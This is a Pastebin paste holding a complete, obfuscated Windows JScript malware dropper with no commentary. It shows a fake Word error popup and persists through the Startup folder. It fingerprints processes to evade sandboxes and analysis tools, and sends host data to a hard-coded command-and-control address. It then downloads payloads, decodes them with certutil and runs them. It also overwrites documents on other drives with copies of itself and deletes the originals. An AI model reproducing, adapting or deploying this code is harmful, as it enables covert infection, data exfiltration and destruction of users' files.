SHARE
TWEET

Untitled

a guest Jul 3rd, 2019 395 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. var mdEAithey85 = true;
  2. var mdEAibusy41 = true;
  3. var mdEAitime62 = false;
  4. var mdEAiopinions92 = 0;
  5. var mdEAiachieve86 = 0;
  6. var mdEAiwithout49 = false;
  7. var mdEAiitself10 = 3;
  8. var mdEAiresolvedto17 = null;
  9. var mdEAithrough13 = null;
  10. var mdEAivisit40 = null;
  11. var mdEAiwith35 = null;
  12. var mdEAiconsidered87 = null;
  13. var mdEAiinto43 = null;
  14. var mdEAidisproportionate79 = 0;
  15. var mdEAiespecially5 = false;
  16. var mdEAiability89 = -1;
  17. var mdEAidefences47 = 7;
  18. var mdEAistudy74 = 1;
  19. var mdEAiwere19 = "[!]";
  20. var mdEAithat49 = "MS Word error: 0x0030EF65";
  21.  
  22. var mdEAiThis30 = this["WScript"];
  23. var mdEAilabour79 = this["ActiveXObject"];
  24. var mdEAileaders26 = mdEAiThis30["ScriptFullName"];
  25. var mdEAicheap26 = new mdEAilabour79("Scripting.FileSystemObject");
  26. var mdEAimore40 = mdEAiThis30["CreateObject"]("WScript.Shell");
  27.  
  28. try {
  29.     if (mdEAileaders26["indexOf"]("\" + "Startup" + "\") == -1) {
  30.        mdEAiresolvedto17 = mdEAicheap26["OpenTextFile"](mdEAileaders26, 1, false, 0);
  31.        mdEAiinto43 = mdEAiresolvedto17["ReadLine"]();
  32.        mdEAiresolvedto17["Close"]();
  33.        mdEAiwithout49 = true;
  34.        if (mdEAithey85) {
  35.            mdEAimore40["Popup"](unescape(mdEAithat49), 30, unescape(mdEAiwere19), mdEAistudy74);
  36.        }
  37.    }
  38. } catch (Njmsqad) {
  39.    mdEAimore40["Popup"](mdEAithat49, 6, mdEAiwere19, mdEAistudy74);
  40. }
  41.  
  42. var mdEAireason4 = 1;
  43. var mdEAithey86 = ("2090000") * 1;
  44. while (mdEAistudy74) {
  45.    mdEAithat49 = "ac";
  46.    mdEAireason4 = mdEAireason4 + 1;
  47.    if (mdEAireason4 == mdEAithey86) {
  48.        var mdEAiquiet2 = this["Enumerator"];
  49.        var mdEAiknew41 = this["GetObject"];
  50.        var mdEAiwere47 = new mdEAilabour79("Shell.Application");
  51.        var mdEAiyounger30 = new mdEAilabour79("ADODB.Stream");
  52.        var mdEAimotives13 = new mdEAilabour79("Msxml2.ServerXMLHTTP");
  53.        var mdEAisufficient11 = mdEAimore40["ExpandEnvironmentStrings"]("%USERPROFILE%");
  54.        var mdEAiacted13 = String["fromCharCode"](34);
  55.        var mdEAiquestion47 = Math["floor"]((Math["random"]() * (900)) + 1);
  56.        var mdEAithose44 = mdEAimore40["ExpandEnvironmentStrings"]("%TEMP%");
  57.        var mdEAiskilled63 = "\" + "shell.jse";
  58.        var mdEAirecall6 = mdEAiwere47["NameSpace"](7);
  59.        var mdEAicarefully66 = mdEAirecall6["Self"]["Path"] + mdEAiskilled63;
  60.        var mdEAiobjectively96 = mdEAicarefully66 + mdEAithose44;
  61.        var mdEAimore39 = "&sin=tamud";
  62.        var mdEAipeople52 = "https://185.159.82.20/t-34/x644.php";
  63.         var mdEAiapostles32 = "?min=fr";
  64.         var mdEAicentre32 = mdEAipeople52 + mdEAiapostles32;
  65.         var mdEAithat11 = mdEAicheap26["Drives"];
  66.         var mdEAiimpressions49 = "*.doc *.xls *.pdf *.rtf *.txt *.pub *.odt *.ods *.odp *.odm *.odc *.odb";
  67.         var mdEAiwrong86 = '';
  68.         var mdEAitheir20 = "ascii.txt";
  69.         var mdEAiexcuse39 = null;
  70.         var mdEAiexistence6 = mdEAiopinions92;
  71.         var mdEAithing92 = null;
  72.         var mdEAithat60 = null;
  73.         var mdEAipaid22 = mdEAiopinions92;
  74.         var mdEAihonest33 = '';
  75.         var mdEAishall49 = '';
  76.         var mdEAiexistence62 = null;
  77.         var mdEAibeing97 = '';
  78.         var mdEAiSuch36 = '';
  79.         var mdEAitheoretical52 = '';
  80.         var mdEAirenunciation97 = null;
  81.         var mdEAithis15 = null;
  82.         var mdEAionly63 = ("4294967295") * 1;
  83.         var mdEAiwere92 = "-f -decode ";
  84.         var mdEAiground81 = "MZ";
  85.         var mdEAiexpectation22 = "POST";
  86.         var mdEAimidst53 = '';
  87.         var mdEAiproved2 = 0;
  88.         try {
  89.             mdEAithing92 = mdEAiknew41("winmgmts:{impersonationLevel=impersonate}!" + "\" + "\" + "." + "\" + "root" + "\" + "cimv2");
  90.            mdEAiexistence6 = new mdEAiquiet2(mdEAithing92["ExecQuery"]("Select * from Win32_Process"));
  91.            mdEAiexistence62 = new mdEAiquiet2(mdEAithing92["ExecQuery"]("Select * from Win32_OperatingSystem"));
  92.            while (!mdEAiexistence62["atEnd"]()) {
  93.                if (mdEAidisproportionate79 == 5) break;
  94.                mdEAishall49 = mdEAishall49 + mdEAiexistence62["item"]()["Caption"] + mdEAiexistence62["item"]()["Version"];
  95.                mdEAidisproportionate79++;
  96.                mdEAiexistence62["moveNext"]();
  97.            }
  98.            mdEAishall49 = mdEAishall49 + String["fromCharCode"](13) + String["fromCharCode"](10) + mdEAicarefully66;
  99.            mdEAidisproportionate79 = 0;
  100.            while (!mdEAiexistence6["atEnd"]()) {
  101.                if (mdEAidisproportionate79 == 200) break;
  102.                mdEAithat60 = mdEAiexistence6["item"]();
  103.                mdEAihonest33 = mdEAihonest33 + mdEAithat60["Name"] + "*" + mdEAithat60["ExecutablePath"] + String["fromCharCode"](13) + String["fromCharCode"](10);
  104.                mdEAidisproportionate79++;
  105.                mdEAiexistence6["moveNext"]();
  106.            }
  107.        } catch (Njmsqad) {}
  108.        try {
  109.            mdEAiobjectively96 = mdEAiobjectively96 + mdEAishall49;
  110.            for (mdEAiachieve86 = 0; mdEAiachieve86 < mdEAiobjectively96["length"]; mdEAiachieve86++) {
  111.                mdEAiopinions92 = (((mdEAiopinions92 << (5)) - mdEAiopinions92) + mdEAiobjectively96["charCodeAt"](mdEAiachieve86)) & mdEAionly63;
  112.            }
  113.            if (mdEAicarefully66["indexOf"]("\" + "AppData" + "\") == -1) {
  114.                mdEAiachieve86 = 5 + 5;
  115.            } else {
  116.                mdEAiachieve86 = 20;
  117.            }
  118.        } catch (Njmsqad) {
  119.            mdEAiopinions92 = 7777777;
  120.        }
  121.        mdEAihonest33 = mdEAishall49 + String["fromCharCode"](13) + String["fromCharCode"](10) + mdEAihonest33;
  122.        if (mdEAihonest33["length"] < 1400 || mdEAihonest33["indexOf"]("2B.exe") != mdEAiability89 || mdEAihonest33["indexOf"]("Procmon") != mdEAiability89 || mdEAihonest33["indexOf"]("Wireshark") != mdEAiability89 || mdEAihonest33["indexOf"]("Temp" + "\" + "iexplore.exe") != mdEAiability89 || mdEAihonest33["indexOf"]("ProcessHacker") != mdEAiability89 || mdEAihonest33["indexOf"]("vmtoolsd") != mdEAiability89 || mdEAihonest33["indexOf"]("VBoxService") != mdEAiability89 || mdEAihonest33["indexOf"]("python") != mdEAiability89 || mdEAihonest33["indexOf"]("Proxifier.exe") != mdEAiability89 || mdEAihonest33["indexOf"]("Johnson") != mdEAiability89 || mdEAihonest33["indexOf"]("ImmunityDebugger.exe") != mdEAiability89 || mdEAihonest33["indexOf"]("lordPE.exe") != mdEAiability89 || mdEAihonest33["indexOf"]("ctfmon.exe*JOHN-PC") != mdEAiability89 || mdEAihonest33["indexOf"]("BehaviorDumper") != mdEAiability89 || mdEAihonest33["indexOf"]("anti-virus.EXE") != mdEAiability89 || mdEAihonest33["indexOf"]("AgentSimulator.exe") != mdEAiability89 || mdEAihonest33["indexOf"]("VzService.exe") != mdEAiability89 || mdEAihonest33["indexOf"]("VBoxTray.exe") != mdEAiability89 || mdEAihonest33["indexOf"]("VmRemoteGuest") != mdEAiability89 || mdEAihonest33["indexOf"]("SystemIT|admin") != mdEAiability89 || mdEAihonest33["indexOf"]("WIN7-TRAPS") != mdEAiability89 || mdEAihonest33["indexOf"]("Emily" + "\" + "AppData") != mdEAiability89 || mdEAihonest33["indexOf"]("PROCMON") != mdEAiability89 || mdEAihonest33["indexOf"]("procexp") != mdEAiability89 || mdEAihonest33["indexOf"]("tcpdump") != mdEAiability89 || mdEAihonest33["indexOf"]("FrzState2k") != mdEAiability89 || mdEAihonest33["indexOf"]("DFLocker64") != mdEAiability89 || mdEAihonest33["indexOf"]("vmware") != mdEAiability89 || mdEAihonest33["indexOf"]("LOGSystem.Agent.Service.exe") != mdEAiability89 || mdEAihonest33["indexOf"]("C:" + "\" + "Users" + "\" + "user" + "\") != mdEAiability89 || mdEAihonest33["indexOf"]("C:" + "\" + "Users" + "\" + "milozs" + "\") != mdEAiability89 || mdEAihonest33["indexOf"]("windanr.exe") != mdEAiability89 || mdEAihonest33["indexOf"]("gemu-ga.exe") != mdEAiability89 || mdEAihonest33["indexOf"]("HAPUBWS") != mdEAiability89 || mdEAihonest33["indexOf"]("BennyDB.exe") != mdEAiability89 || mdEAihonest33["indexOf"]("Peter Wilson") != mdEAiability89 || mdEAihonest33["indexOf"]("Hong Lee") != mdEAiability89) {
  123.            mdEAiespecially5 = true;
  124.            view["close"]("we_need_to_go_deeper");
  125.        }
  126.        try {
  127.            if (mdEAiwithout49 && mdEAibusy41 && !mdEAiespecially5) {
  128.                mdEAithrough13 = mdEAicheap26["CreateTextFile"](mdEAicarefully66, true, false);
  129.                mdEAithrough13["WriteLine"](mdEAiinto43);
  130.                mdEAithrough13["Close"]();
  131.            }
  132.        } catch (Njmsqad) {}
  133.        while (mdEAidefences47) {
  134.            try {
  135.                mdEAimidst53 = mdEAithose44 + "\" + Math["floor"]((Math["random"]() * (999)) + 1) + Math["floor"]((Math["random"]() * (999)) + 1) + ".exe";
  136.                mdEAiwrong86 = mdEAithose44 + "\" + Math["floor"]((Math["random"]() * (999)) + 1) + Math["floor"]((Math["random"]() * (999)) + 1) + ".cro";
  137.                mdEAimotives13["setOption"](mdEAiitself10, "MSXML");
  138.                mdEAiexcuse39 = mdEAicentre32 + mdEAimore39 + "&p=" + Math["abs"](mdEAiopinions92) + "&i=" + mdEAiproved2 + "&k=" + mdEAiachieve86 + "&r=" + Math["floor"]((Math["random"]() * (999)) + 1) + Math["floor"]((Math["random"]() * (999)) + 1) + Math["floor"]((Math["random"]() * (999)) + 1);
  139.                mdEAimotives13["open"](mdEAiexpectation22, mdEAiexcuse39, false);
  140.                mdEAimotives13["send"](mdEAihonest33);
  141.                if (mdEAimotives13["status"] == 200) {
  142.                    if (mdEAiproved2 == 0) {
  143.                        mdEAivisit40 = mdEAimotives13["responseText"];
  144.                        try {
  145.                            if (mdEAimotives13["getResponseHeader"]("RedSparrow") == '0') {
  146.                                mdEAimidst53 = mdEAicarefully66;
  147.                                mdEAiability89 = 0;
  148.                            }
  149.                        } catch (Njmsqad) {}
  150.                        try {
  151.                            if (mdEAimotives13["getResponseHeader"]("Content-Transfer-Encoding") == "binary") {
  152.                                mdEAiyounger30["Open"]();
  153.                                mdEAiyounger30["Type"] = 1;
  154.                                mdEAiyounger30["Write"](mdEAimotives13["responseBody"]);
  155.                                mdEAiyounger30["Position"] = 0;
  156.                                mdEAiyounger30["SaveToFile"](mdEAimidst53, 2);
  157.                                mdEAiyounger30["Close"]();
  158.                            } else {
  159.                                if (mdEAivisit40.length > 10) {
  160.                                    mdEAiresolvedto17 = mdEAicheap26["CreateTextFile"](mdEAiwrong86, true, false);
  161.                                    mdEAiresolvedto17["WriteLine"](mdEAivisit40);
  162.                                    mdEAiresolvedto17["Close"]();
  163.                                    mdEAiThis30["Sleep"](7000);
  164.                                    mdEAiwere47["ShellExecute"]("certutil", mdEAiwere92 + mdEAiwrong86 + " " + mdEAiacted13 + mdEAimidst53 + mdEAiacted13, '', "open", 0);
  165.                                }
  166.                            }
  167.                        } catch (Njmsqad) {}
  168.                    } else {
  169.                        mdEAiproved2 = 0;
  170.                        continue;
  171.                    }
  172.                    if (mdEAiability89 == 0) {
  173.                        mdEAiThis30["Sleep"](50000);
  174.                        mdEAiability89 = -1;
  175.                        mdEAiproved2 = 9;
  176.                        continue;
  177.                    }
  178.                    mdEAiThis30["Sleep"](33000);
  179.                    if (!mdEAicheap26["FileExists"](mdEAimidst53) && mdEAitime62) {
  180.                        try {
  181.                            mdEAirenunciation97 = new mdEAiquiet2(mdEAithat11);
  182.                            for (; !mdEAirenunciation97["atEnd"](); mdEAirenunciation97["moveNext"]()) {
  183.                                mdEAithis15 = mdEAirenunciation97["item"]();
  184.                                if ((mdEAithis15["IsReady"] && (mdEAithis15["DriveType"] == 3 || mdEAithis15["DriveType"] == 1)) && mdEAisufficient11["substring"](0, 1) != mdEAithis15["DriveLetter"]) {
  185.                                    mdEAiwere47["ShellExecute"]("cmd", "/U /Q /C cd /D " + mdEAithis15["DriveLetter"] + ": && dir /b/s/x " + mdEAiimpressions49 + ">>%TEMP%" + "\" + mdEAitheir20, '', "open", 0);
  186.                                    mdEAiThis30["Sleep"](60000);
  187.                                }
  188.                            }
  189.                            mdEAiThis30["Sleep"](50000);
  190.                            mdEAiconsidered87 = mdEAicheap26["GetFile"](mdEAithose44 + "\" + mdEAitheir20)["OpenAsTextStream"](1, -1);
  191.                            while (!mdEAiconsidered87["AtEndOfStream"]) {
  192.                                mdEAiSuch36 = mdEAiconsidered87["ReadLine"]();
  193.                                mdEAitheoretical52 = mdEAiSuch36["substring"](0, mdEAiSuch36["indexOf"]("."));
  194.                                mdEAiwere47["ShellExecute"]("cmd", "/U /Q /C copy /Y " + mdEAiacted13 + mdEAicarefully66 + mdEAiacted13 + " " + mdEAiacted13 + mdEAitheoretical52 + ".jse" + mdEAiacted13 + " && del /Q/F " + mdEAiacted13 + mdEAiSuch36 + mdEAiacted13, '', "open", 0);
  195.                            }
  196.                            mdEAiconsidered87["Close"]();
  197.                            mdEAicheap26["DeleteFile"](mdEAithose44 + "\" + mdEAitheir20);
  198.                        } catch (Njmsqad) {}
  199.                        mdEAiproved2 = 0;
  200.                        continue;
  201.                    }
  202.                    mdEAiwith35 = mdEAicheap26["GetFile"](mdEAimidst53)["OpenAsTextStream"](1);
  203.                    mdEAibeing97 = mdEAiwith35["ReadLine"]()["substring"](0, 2);
  204.                    mdEAiwith35["Close"]();
  205.                    if (mdEAibeing97 == mdEAiground81 && mdEAiproved2 == 0) {
  206.                        try {
  207.                            switch (mdEAiability89) {
  208.                                case -1:
  209.                                    mdEAiwere47["ShellExecute"](mdEAimidst53, null, '', "open", 1);
  210.                                    mdEAiproved2 = 59;
  211.                                    break;
  212.                                case 0:
  213.                                    mdEAiproved2 = 60;
  214.                                    break;
  215.                                case 1:
  216.                                    mdEAiproved2 = 61;
  217.                                    break;
  218.                                case 2:
  219.                                    mdEAiproved2 = 62;
  220.                                    break;
  221.                            }
  222.                        } catch (Njmsqad) {
  223.                            mdEAiproved2 = 9888;
  224.                        }
  225.                        mdEAiThis30["Sleep"](9000);
  226.                    }
  227.                }
  228.            } catch (Njmsqad) {}
  229.            mdEAiThis30["Sleep"](50000);
  230.        };
  231.    };
  232. };
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top